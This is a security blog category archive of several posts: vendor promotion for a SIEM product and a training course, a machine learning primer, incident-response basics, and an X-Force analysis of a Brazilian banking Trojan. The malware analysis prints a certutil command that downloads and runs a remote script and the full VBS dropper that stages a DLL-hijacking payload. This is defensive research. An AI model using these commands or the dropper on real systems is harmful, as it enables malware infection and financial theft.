Category Archives: Threat Intelligence

3 Security Business Benefits From a 2018 Gartner Magic Quadrant SIEM Leader

Last week Gartner published its 2018 Magic Quadrant for Security Information and Event Management (SIEM). As in past years, the report supports the steady evolution of SIEM technology and the growing demand from customers for simple SIEM functionality with an architecture built to scale that meets both current and future use cases.

So how do we interpret from Gartner what it means to be a SIEM leader in 2018? Based on a quick dissection, the main characteristics of a leading SIEM tool are centered around innovation in early threat detection, adaptation to customer environments and strong market presence.

Read the 2018 Gartner Magic Quadrant for SIEM

What Separates a SIEM Leader From the Rest of the Market?

The first element, early detection via analytics — more clearly stated as efficacy in threat detection and response — remains the centerpiece of any effective SIEM solution. Security analysts and security operations center (SOC) leaders today need to detect both known and unknown threats in real time. By applying analytics to a combination of threat intelligence, behavioral analytics and a wide variety of security monitoring data, organizations can improve both their time to detection and total alert volumes. While these two basic outcomes — reduced dwell time and fewer alerts — sound tactical, they can ultimately help security teams become less distracted and more effective at managing threats, which helps reduce business risks and liabilities and maintain a positive brand reputation.

IBM is a leader in the 2018 Gartner Magic Quadrant for SIEM

The second element of Gartner’s definition of a leader, rapid adaptation to customer environments, is becoming a core factor in how much return on investment (ROI) customers realize and how quickly they realize it. Ad hoc content, add-on applications and flexibility in upgrading the platform are all required to mature a SIEM system in an affordable way once it’s installed.

Also included in this element is the ability to scale the platform in terms of both network coverage and security capabilities. By using out-of-the-box content to automate and streamline more security workflows, organizations can better combat challenges related to the shortage of skills and headcount and better enable the business to adopt new technologies that can help increase its competitive position.

The third element of a leading SIEM is strong market presence and easy access to services. Growth rates around the world still vary based on local security maturity, regulations and specific geographic needs. Customers are looking for access to local resources to help meet their unique requirements and learn lessons from a local community that has already gone through SIEM deployment. It is not uncommon for customers to first select a SIEM platform and then find a local managed service provider or systems integrator for operational support or oversight. Support for this approach provides SIEM users with multiple options to help optimize operating expenses without cutting into expertise.

Take Your SIEM Deployment to the Next Level

IBM was named a SIEM leader in the 2018 Gartner Magic Quadrant report. The IBM QRadar platform has demonstrated continuous innovation that has expanded its value, from its origins in network behavior anomaly detection to real-time threat detection to more recent developments that help automate investigations and streamline orchestrated response processes.

Unique to QRadar is the simplified approach to provide a continuous evolution of use cases and deployment options via optimized content packs, easily downloadable apps from IBM Security App Exchange and flexible deployment options that support organizations regardless of where they are on their cloud journey.

Market presence also contributed to IBM’s leadership; a community of thousands of customers worldwide, a strong business partner network and a wealth of services options allows QRadar customers to easily find knowledgeable local resources that can help them maintain and scale their platform.

To learn more about Gartner’s full review of QRadar, SIEM market trends and vendor evaluation criteria, download your complimentary copy of the 2018 Gartner Magic Quadrant for SIEM. We also invite you to register forour upcoming webinar, “Stay Ahead of Threat Detection & Response with a Scalable SIEM Platform.” The webinar will take place Dec. 18 at 11 a.m. ET and will be available to watch on-demand thereafter.

Register for the webinar

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post 3 Security Business Benefits From a 2018 Gartner Magic Quadrant SIEM Leader appeared first on Security Intelligence.

Advance Your Blue Teaming Skills with IHRP

The Incident Handling & Response Professional (IHRP) training course is now available for enrollment. Discover this course’s details and see how you can benefit from it to better your defensive skills and become the IR professional companies wish they had.

In today’s hyper-connected world where everyone is a target to cybercriminals, organizations are fighting tooth and nails to find skilled cybersecurity professionals. While it’s a great asset to have red-teaming skills, companies expect their IT Security teams to not only know how to defend and assist in cases of malicious intrusions but also to have the right skills to hunt and secure them from such events in the first place. If you’re reading this because you’re interested in learning more and/or switching to the blue side of security, then IHRP might just be the right training course for you.

Incident Handling & Response Professional (IHRP) 

The Incident Handling & Response Professional (IHRP) training course is self-paced and highly hands-on. Here are some of the benefits of this course modules:

  • Documents how to set up an incident handling & response capability
  • Analyzes in-detail how attackers operate and how to detect each Technique, Tactic, and Procedure they use
  • Covers detecting intrusions or intrusion attempts during all stages of the Cyber Kill Chain
  • Showcases a variety of different intrusion detection techniques such as: analyzing traffic, flows, and endpoints, as well as performing correlations and endpoint or protocol analytics
  • Covers how to effectively utilize and fine-tune open-source IDS solutions (Snort, Bro, Suricata etc.)
  • Makes students capable of making the best of open-source SIEM solutions (ELK stack, Splunk, Osquery etc.)
  • Showcases how tactical threat intelligence can enhance your detection capabilities
  • Documents how to leverage baselines for effective intrusion detection
  • Provides students with real-life incident response scenarios

Want to know more? Discover the detailed syllabus here.

Why You Should Consider IHRP
  • Hands-on and real-life scenario labs: There is no substitute for learning IT Security hands-on, just like learning how to drive a car. You have to sit in it to fully learn the skills. All the labs of this training course simulate real-life scenarios.
  • Hours of video course materials: Videos help illustrate and understand complicated topics from the course slides more easily
  • Thousands of course slide materials: Interactive learning at your own speed, skipping back and forth to fully understand each topic before practicing labs and/or taking your exam. Slides will always be available to you in your member’s area.
  • Lifetime access to the course materials: Nobody can remember everything, you can always come back to double check on something you learned.
  • Exam voucher to get certified included: There is no additional cost or headache to get certified. Your course content in the Full and Elite Editions covers everything that is needed to pass the exam.
  • Online learning: You can obtain both the theoretical and practical skills from the comfort of your own home or office. A major benefit is that you can decide when to learn, and you can do so at your own speed. This also saves time and additional cost for travel and accommodation.

Get Early Access & 50% Off Your Course Fees

Interested in learning everything blue-team? Enjoy 50% off the new IHRP training course fees in Elite Edition when you enroll before December 31, 2018.  This early access offer will grant you immediate access to the first two modules, ‘Incident Handling Process’ and ‘Intrusion Detection by Analyzing Traffic’, and hands-on labs in which you will be tasked with detecting real-world attacks and malware. New content will be added automatically in your member’s area every two weeks, as it becomes available. Enrollments after January 1st will be closed until the final release of this training course in March.

Interested in this blue teaming course? Enroll before December 31st and get 50% off your course fees discounted automatically on the checkout page 😉


Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime

In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.

Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.

Compromising Brazilian Users One Remote Session at a Time

IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.

Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.

The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.

Read the white paper: Preserving trust in digital financial services

Rising Interest in Cryptocurrency

Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.

Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.

A Typical Infection Routine

A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:

  1. The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
  2. The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
  3. The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
  4. The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
  5. The VBS script executes the malware, infecting the device.
  6. Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
  7. After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
  8. The malicious DLL component gives the malware its remote control capabilities.

Zooming In on the Malicious LNK File

A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.

First, the malicious script is downloaded from the remote server under the name “tudodebom”:

“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt
  • -urlcache displays or deletes URL cache entries.
  • -split -f forces fetching of a specific URL and updating of the cache.

Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:

“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs

The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:


Lastly, the malware executes the malicious VBS script.

Examining the VBS Script

The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:

“C:\AV product_” + RandomName + “\”

After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.

Interesting elements in this routine include:

  • The use of legitimate remote servers to host attack tools;
  • The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
  • The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.

Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:

Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll

Set objShell = CreateObject( “WScript.Shell” )

ubase = “https://remoteserver/turbulencianoar/”

randname = getrandomstring()

exerandom = “AV product.SystrayStartTrigger-” + randname

filezip = “”

deffolder = “C:\AV product_” + randname + “\”

filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”

fileexe = “AuZwaaU.exe”

filedll = “AuZwaaU.sys”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(filesuccess)) Then


End If

If not (objFSO.FileExists(filezip)) Then

Set objFile = objFSO.CreateTextFile(filesuccess, True)

objFile.Write ” ”


‘WScript.Echo msg

dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)

dim bStrm: Set bStrm = createobject(“Adodb.Stream”)

xHttp.Open “GET”, ubase, False


with bStrm

.type = 1


.write xHttp.responseBody

.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2

end with

WScript.Sleep 5000

set objShellApp = CreateObject(“Shell.Application”)

set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items


WScript.Sleep 5000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip

objFSO.CreateFolder deffolder

WScript.Sleep 3000

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”

WScript.Sleep 5000

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

Set objShell = CreateObject( “WScript.Shell” )

outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write “@echo off” & vbCrLf

objFile.Write “@cd ” & deffolder & vbCrLf

objFile.Write “start ” & exerandom & “.exe” & vbCrLf


objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)

WScript.Sleep 10000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objShell = Nothing

Set objFSO = Nothing

Set objShellApp = Nothing

End If

Function getrandomstring()

Dim intMax, k, intValue, strChar, strName

Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

intMax = 6


strName = “”

For k = 1 To intMax

intValue = Fix(62 * Rnd())

strChar = Mid(Chars, intValue + 1, 1)


intValue = Fix(62 * Rnd())

strChar = strChar & Mid(Chars, intValue + 1, 1)

strName = strName & strChar

If (k < 6) Then

strName = strName & “”

End If


getrandomstring = strName

End Function

Remote Overlay Images

Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.

To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and confirms the user’s security with a fresh one-time password from their tokenization method.

Brazilian remote overlay Trojan

Figure 1: Fake overlay screen asks users to provide information about their identity.

Remote Overlay Brazilian Malware is after cryptocurrency

Figure 2: Fake overlay screen asks users to submit a token code.

Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:

Brazilian Remote Overlay Malware Asks for SSO

Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.

Mitigate Financial Cybercrime Risks

Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.

Read the white paper: Preserving trust in digital financial services

The post The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime appeared first on Security Intelligence.

Machine Learning Algorithms Are Not One-Size-Fits-All

This is the second installment in a three-part series about machine learning. Be sure to read part one for the full story.

When designing machine learning solutions for security, it’s important to decide on a classifier that will perform the best with minimal error. Given the sheer number of choices available, it’s easy to get confused. Let’s explore some tips to help security leaders select the right machine learning algorithm for their needs.

4 Types of Machine Learning Techniques

If you know which category your problem falls into, you can narrow down your choices. Machine learning algorithms are broadly categorized under four types of learning problems.

1. Supervised Learning

Supervised learning trains the algorithm based on example sets of input/output pairs. The goal is to develop new inferences based on patterns inferred from the sample results. Sample data must be available and labeled. For example, designing a spam detector model by learning from samples of labeled spam/nonspam is supervised learning. Another example is a problem such as the Defense Advanced Research Projects Agency (DARPA)’s Knowledge Discovery and Data Mining 1999 challenge (KDD-99), in which contestants competed to design a machine learning-based intrusion detection system (IDS) from a set of 41 features per instance labeled either “attack” or “normal.”

2. Unsupervised Learning

Unsupervised learning uses data that has not been labeled, classified or categorized. The machine is challenged to identify patterns through processes such as clustering, and the outcome is usually unknown. Clustering is a task in which samples are compared with each other in an attempt to find examples that are close to each other, usually by either a measure of density or a distance metric, such as Euclidian distance when projected into a high-dimensional space.

A security problem that falls into this category is network anomaly detection, which is a different method of designing an IDS. In this case, the algorithm doesn’t assume that it knows an attack from a normal input. Instead, the algorithm tries to understand what normal traffic is by watching the network in a (hopefully) clean state so that it can learn the patterns of traffic. Then, anything that falls outside of this “normal” region is a possible attack. Note that there is a great deal of uncertainty with these algorithms because they do not actually know what an attack looks like.

3. Semisupervised Learning

This type of learning uses a combination of labeled and unlabeled data, typically with the majority being unlabeled. It is primarily used to provide some concept of a known classification to unsupervised algorithms. Several techniques, such as label spreading and weakly supervised learning, can also be employed to augment a supervised training set with a small number of samples. This requires a great deal of work because it is an extremely common scenario.

For the challenge of exploit kit identification, for example, we can find some known exploit kits to train our model, but there are many variants and unknown kits that can’t be labeled. Semisupervised learning can help solve this problem. Note that semisupervised and fully supervised learning can often be differentiated by the choice of features to learn against. Depending on the features, you can often label much more data than you can with another selected set of features.

4. Reinforcement Learning

Unlike the other three types of learning problems, reinforcement learning seeks the optimal path to a desired result by rewarding improvement. The problem set is generally small and the training data well-understood. An example is a generative adversarial network (GAN) such as this experiment, in which the distance, measured in correct and incorrect bits, was used as a loss function to encrypt messages between two neural networks.

Another example is PassGAN, where a GAN was trained to guess passwords more efficiently and the reinforcement function, at a very high level, was how many passwords it guessed correctly. Specifically, PassGAN learned rules to take a dictionary and create likely passwords based on an actual set of leaked passwords. It modeled human behavior in guessing the ways that humans transformed passwords into nondictionary character strings.

Problem Type and Training Data

Another, broader categorization of algorithm is based on the type of problem, such as classification, regression, anomaly detection or dimensionality reduction. There are specific machine learning algorithms designed for each type of problem.

Once you have narrowed down your choices based on the above broader categories, you should consider the algorithm’s bias or variance.

Bias is defined in practical effect as the ability of an algorithm to model the training data accurately. Bias represents the proximity of the model to the training data. A high bias results in the model missing relationships between features and the target variable, which leads to what is known as underfitting.

Variance is how accurately the model measures noise in the distribution of training samples. A high variance means that random variables are captured more effectively. Obviously, we do not want this either. Therefore, we seek to minimize both of these values. We can control bias and variance through different parameters. For example, the k-means algorithm with a high value of k gives us high bias and low variance. This makes sense because the value of k means that we have allowed more clusters in space to form, and more of the relationships among the features will be missed as the algorithm fits the data to a larger number of clusters.

A deeper decision tree has more variance because it contains more branches (decision points) and therefore has more false relationships that model noise in the training data. For artificial neural networks (ANNs), variance increases and bias decreases with the increase in the number of layers. Therefore, deep learning has a very low bias. However, this is at the cost of more noise being represented in the deep learning models.

Other Considerations for Selecting Machine Learning Algorithms

Data type also dictates the choice of algorithm because some algorithms work better on certain data types than others. For example, support vector machines (SVMs), linear and logistic regression, and neural networks require the feature vector to be numerical. On the other hand, decision trees can be more flexible to different data types, such as nominal input.

Some algorithms perform poorly when there is correlation between the features — meaning that multiple features demonstrate the same patterns. A feature that is defined as the result of calculations based on other features would be highly correlated with those input features. Linear regression and logistic regression, along with other algorithms, require regularization to avoid numerical instabilities that come from redundancy in data.

The relationship between independent and dependent variables can also help us determine which algorithm to choose. Because naive Bayes, linear regression and logistic regression perform well if each feature has an independent contribution to the output, these algorithms are poor choices for correlated data. Unfortunately, when features are extracted from voluminous data, it is often impossible to know whether the independence assumption holds true without further analysis. If the relationship is more complex, decision trees or neural networks may be a better choice.

Noise in the output values can also inform which algorithm to choose, as well as the parameters for your selected algorithm. However, you are best served by cleaning the data of noise. If you can’t clean the data, you will most likely receive results with poor classification boundaries. An SVM, for example, is very sensitive to noise because it attempts to draw a margin, or boundary, between or among the classes of the data as they are labeled. A decision tree or bagged tree such as a random forest might be a better choice here since these allow for the tree(s) to be pruned. A shallower tree models less noise.

Dimensionality of the input space is critical to your decision as well. In dimensionality, there are two common phenomena that are directly at odds with each other. First, the so-called curse of dimensionality occurs when the data contains a very large number of features. If you think about this in special terms, a two-dimensional figure verses a three-dimensional figure can look very different. A very packed set of points on a plane can become spread apart once we add the third dimension. If we try to cluster these points, the distances between two arbitrary points will dramatically increase.

Alternatively, the blessing of dimensionality means that having more dimensions helps us model the problem more completely. In this sense, the plane may pack completely unrelated points together because the two-dimensional coordinates are close to each other even though they have nothing to do with each other. In three dimensions, these points might be spread farther apart, showing us a more complete separation of the unrelated points.

These two ideas cause us, as domain experts and deep learning designers, to pick our features carefully. We do not want to encounter the sparsity of the curse of dimensionality because there might not be a clear boundary, but we also do not want to pack our unrelated examples too close to each other and create an unusable boundary. Some algorithms work better in higher dimensions. In very high dimensional space, for example, you might choose a boosted random forest or a deep learning model.

Transparency and Functional Complexity

The level of visibility into the model’s decision process is a very important criterion for selecting an algorithm. Algorithms that provide decision trees show clearly how the model reached a decision, whereas a neural network is essentially a black box.

Similarly, you should consider functional complexity and the amount of training data. Functional complexity can be understood in terms of things like speed and memory usage. If you lack sufficient computational power or memory in the machine on which your model will be run, you should choose an algorithm such as naive Bayes or one of the many rules generator-based algorithms. Naive Bayes counts the frequencies of terms, so its model is only as big as the number of features in the data. Rules generators essentially create a series of if/then conditions that the data must satisfy to be classified correctly. These are very good for low-complexity devices. If, however, you have a good deal of power and memory, you might go so far as deep learning, which (in most but not all configurations) requires many more resources.

How Much Training Data Do You Need?

You might also opt for naive Bayes if you have a smaller set of training data available. A small training data size will severely limit you, so it is always best to acquire as much data as you can. A few hundred might be able to construct a shallow decision tree or a naive Bayesian model. A few thousand to tens of thousands is usually enough to create an effective random forest, an algorithm that performs very well in most learning problems. Finally, if you want to try deep learning, you may need hundreds of thousands — or, preferably, millions — of training examples, depending on how many layers you want your deep learning model to have.

Try Several Classifiers and Pick the Best

When all else fails, try several classifiers that are suitable for your problem and then compare the results. Key metrics include accuracy of the model and true and false positive rates; derived metrics such as precision, recall and F1; and even metrics as complex as area under the receiver operating characteristic curve (AUC) and area under the precision-recall curve (AUPRC). Each measurement tells you something different about the model’s performance. We’ll define these metrics in greater detail in the final installment of our three-part series.

The post Machine Learning Algorithms Are Not One-Size-Fits-All appeared first on Security Intelligence.

The 4 Steps Of Incident Handling & Response

An estimated 3.6 billion records were breached in the first 9 months of 2018 alone. While these numbers show some improvement, cyber incidents will inevitably continue to happen. For that, security professionals need to know the Incident Handling and Response processes.

According to NIST’s Computer Security Incident Handling Guide, the Incident Response (IR) life cycle is made of 4 phases, as shown below.

1. Preparation

In this initial phase, organizations plan to handle incidents and attempt to limit the number of potential incidents by selecting and implementing a set of controls based on the results of risk assessments. This step involves outlining everyone’s responsibility, hardware, tools, documentation, etc. and taking steps to reduce the possibility of an incident happening.

2. Detection & Analysis

In this phase, the IR team analyzes all the symptoms reported and confirms whether or not the situation would be classified as an incident.

3. Containment, Eradication, and Recovery
In this phase, The IR team now gathers intel and create signatures that will help them identify each compromised system. With this information, the organization can mitigate the impact of incidents by containing them and countermeasures can be put in place to neutralize the attacker and restore systems/data back to normal.
4. Post-incident Activities

This is more of a ‘lesson learned’ phase. Its goal is to improve the overall security posture of the organization and to ensure that similar incidents won’t happen in the future.

When incidents happen, we tend to panic and wonder “what now?”. It’s important to remain calm and follow best practices and company procedures. For this reason, NIST has published its Computer Security Incident Handling Guide to lead you through the preparation, detection, handling, and recovery steps of Incident Handling & Response.

Interested in learning more about this topic? Join us on December 11 to discover a preview of the Incident Handling and Response Professional (IHRP) training course and take part in an exciting live demonstration.

Connect with us on Social Media

Twitter Facebook LinkedIn Instagram

Achieve Community Immunity With Security Data Integration

Security is a team sport. Both threat actors and cybersecurity professionals are teaming up and collaborating in greater numbers than ever. In fact, a United Nations study found that crime rings that regularly share information drive around 80 percent of cyberattacks. The dark web has become the standard platform to share security data, as well as an effective marketplace to monetize cybercrime activities.

On the defensive side, mature security programs are developing approaches to integrate different teams. According to The New York Times, some companies are even building fusion centers where employees from a range of backgrounds — from fraud detection to forensic analysis to customer service — work together to fight threats. Motivated by the demand from customers, IBM Security built a cyber range and a mobile Cyber Tactical Operations Center (C-TOC) to help battle-test security teams with crisis simulations.

How Can Cybersecurity Professionals Foster More Collaboration?

While many organizations are using the Department of Homeland Security (DHS)’s fusion centers as a model to foster collaboration among teams, the vast majority of companies are facing a skills shortage. According to ISACA, 27 percent of U.S. enterprises are unable to fill open roles for cybersecurity professionals. Given this challenge, how can enterprises promote collaboration and, more importantly, use it to drive better security outcomes?

When considering how to prevent cybercrime, it’s critical to break down barriers to collaboration. It’s time for us to learn from each other, and not reinvent the wheel when it is already working for someone else. We must use the spirit of community to inoculate ourselves against threats and gain long-term immunity. The human race has conquered many deadly diseases, such as smallpox and polio, through community immunity — so why not bring this concept to cybersecurity?

Here are three ways to foster collaboration among teams and achieve community immunity with the help of a security data integration platform:

1. Gain a Global Perspective

We should be able to leverage insights from our peers to enrich our own decision-making. One way to do this is by using a threat score or another normalized method of sharing threat intelligence. Threat sharing should always be anonymous to protect the privacy and security of enterprises and individuals. Threat intelligence should also be specific, whether at the regional or industry level, to make it relevant and actionable.

2. Reduce Blind Spots

Threat intelligence is just one part of security. Analysts need visibility into many other areas, such as database vulnerabilities and fraud analytics. Having a single, collaborative platform to share this security data allows other analysts and researchers to build on and refine the information and, in turn, share improved data with the security community.

3. Generate Personalized Recommendations

The power of global analytics is in leveraging the learnings from a broader environment and making them relevant to us. We often see this approach in retail, where websites recommend a product based on your purchase history or user profile. In security, a recommendation engine that proactively surfaces improvements to your existing program or tips to fine-tune your deployments can be incredibly useful. In addition, as customers move toward purchasing micro-apps and services and when they need them, a recommendation engine can proactively suggest solutions so analysts can stay ahead of threats and leverage the latest innovations available to them.

Don’t Go It Alone

So, how will you build your team? If anything is certain about today’s evolving cyberthreat landscape, it’s that you can’t go it alone. By fostering relationships with peers, improving visibility into databases and vulnerabilities, and investing in systems that generate personalized recommendations, security leaders can launch a more coordinated and collaborative counterattack in the ongoing battle against cybercrime.

The post Achieve Community Immunity With Security Data Integration appeared first on Security Intelligence.

Fight Evolving Cybersecurity Threats With a One-Two-Three Punch

When I became vice president and general manager for IBM Security North America, the staff gave me an eye-opening look at the malicious hackers who are infiltrating everything from enterprises to government agencies to political parties. The number of new cybersecurity threats is distressing, doubling from four to eight new malware samples per second between the third and fourth quarters of 2017, according to McAfee Labs.

Yet that inside view only increased my desire to help security professionals fulfill their mission of securing organizations against cyberattacks through client and industry partnerships, advanced technologies such as artificial intelligence (AI), and incident response (IR) training on the cyber range.

Cybersecurity Is Shifting From Prevention to Remediation

Today, the volume of threats is so overwhelming that getting ahead is often unrealistic. It’s not a matter of if you’ll have a breach, it’s a matter of when — and how quickly you can detect and resolve it to minimize damage. With chief information security officers (CISOs) facing a shortage of individuals with the necessary skills to design environments and fend off threats, the focus has shifted from prevention to remediation.

To identify the areas of highest risk, just follow the money to financial institutions, retailers and government entities. Developed countries also face greater risks. The U.S. may have advanced cybersecurity technology, for example, but we also have assets that translate into greater payoffs for attackers.

Remediation comes down to visibility into your environment that allows you to notice not only external threats, but internal ones as well. In fact, internal threats create arguably the greatest vulnerabilities. Users on the inside know where the networks, databases and critical information are, and often have access to areas that are seldom monitored.

Bring the Power of Partnerships to Bear

Once you identify a breach, you’ll typically have minutes or even seconds to quarantine it and remediate the damage. You need to be able to leverage the data available and make immediate decisions. Yet frequently, the tools that security professionals use aren’t appropriately implemented, managed, monitored or tuned. In fact, 44 percent of organizations lack an overall information security strategy, according to PwC’s “The Global State of Information Security Survey 2018.”

Organizations are beginning to recognize that they cannot manage cybersecurity threats alone. You need a partner that can aggregate data from multiple clients and make that information accessible to everyone, from customers to competitors, to help prevent breaches. It’s like the railroad industry: Union Pacific, BNSF and CSX may battle for business, but they all have a vested interest in keeping the tracks safe, no matter who is using them.

Harden the Expanding Attack Surface

Along with trying to counteract increasingly sophisticated threats, enterprises must also learn how to manage the data coming from a burgeoning number of Internet of Things (IoT) devices. This data improves our lives, but the devices give attackers even more access points into the corporate environment. That’s where technology that manages a full spectrum of challenges comes into play. IBM provides an immune system for security from threat intelligence to endpoint management, with a host of solutions that harden your organization.

Even with advanced tools, analysts don’t always have enough hours in the day to keep the enterprise secure. One solution is incorporating automation and AI into the security operations center (SOC). We layer IBM Watson on top of our cybersecurity solutions to analyze data and make recommendations. And as beneficial as AI might be on day one, it delivers even more value as it learns from your data. With increasing threats and fewer resources, any automation you can implement in your cybersecurity environment helps get the work done faster and smarter.

Make Incident Response Like Muscle Memory

I mentioned malicious insider threats, but users who don’t know their behavior creates vulnerabilities are equally dangerous — even if they have no ill intent. At IBM, for example, we no longer allow the use of thumb drives since they’re an easy way to compromise an organization. We also train users from myriad organizations on how to react to threats, such as phishing scams or bogus links, so that their automatic reaction is the right reaction.

This is even more critical for incident response. We practice with clients just like you’d practice a golf swing. By developing that muscle memory, it becomes second nature to respond in the appropriate way. If you’ve had a breach in which the personally identifiable information (PII) of 100,000 customers is at risk — and the attackers are demanding payment — what do you say? What do you do? Just like fire drills, you must practice your IR plan.

Additionally, security teams need training to build discipline and processes, react appropriately and avoid making mistakes that could cost the organization millions of dollars. Response is not just a cybersecurity task, but a companywide communications effort. Everyone needs to train regularly to know how to respond.

Check out the IBM X-Force Command Cyber Tactical Operations Center (C-TOC)

Fighting Cybersecurity Threats Alongside You

IBM considers cybersecurity a strategic imperative and, as such, has invested extensive money and time in developing a best-of-breed security portfolio. I’m grateful for the opportunity to put it to work to make the cyber world a safer place. As the leader of the North American security unit, I’m committed to helping you secure your environments and achieve better business outcomes.

The post Fight Evolving Cybersecurity Threats With a One-Two-Three Punch appeared first on Security Intelligence.

5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics

The internet has fueled growth opportunities for enterprises by allowing them to establish an online presence, communicate with customers, process transactions and provide support, among other benefits. But it’s a double-edged sword: A cyberattack that compromises these business advantages can easily result in significant losses of money, customers, credibility and reputation, and increases the risk of completely going out of business. That’s why it’s critical to have a cybersecurity strategy in place to protect your enterprise from attackers that exploit internet vulnerabilities.

How DNS Analytics Can Boost Your Defense

The Domain Name System (DNS) is one of the foundational components of the internet that malicious actors commonly exploit and use to deploy and control their attack framework. The internet relies on this system to translate names, known as Uniform Resource Locators (URLs), into numbers, known as Internet Protocol (IP) addresses. Giving each IP a unique identifier allows computers and devices to send and receive information across networks. However, DNS also opens the door for opportunistic cyberattackers to infiltrate networks and access sensitive information.

Here are five tips to help you uncover hidden cyberthreats and protect your enterprise with DNS analytics.

1. Think Like an Attacker to Defend Your Enterprise

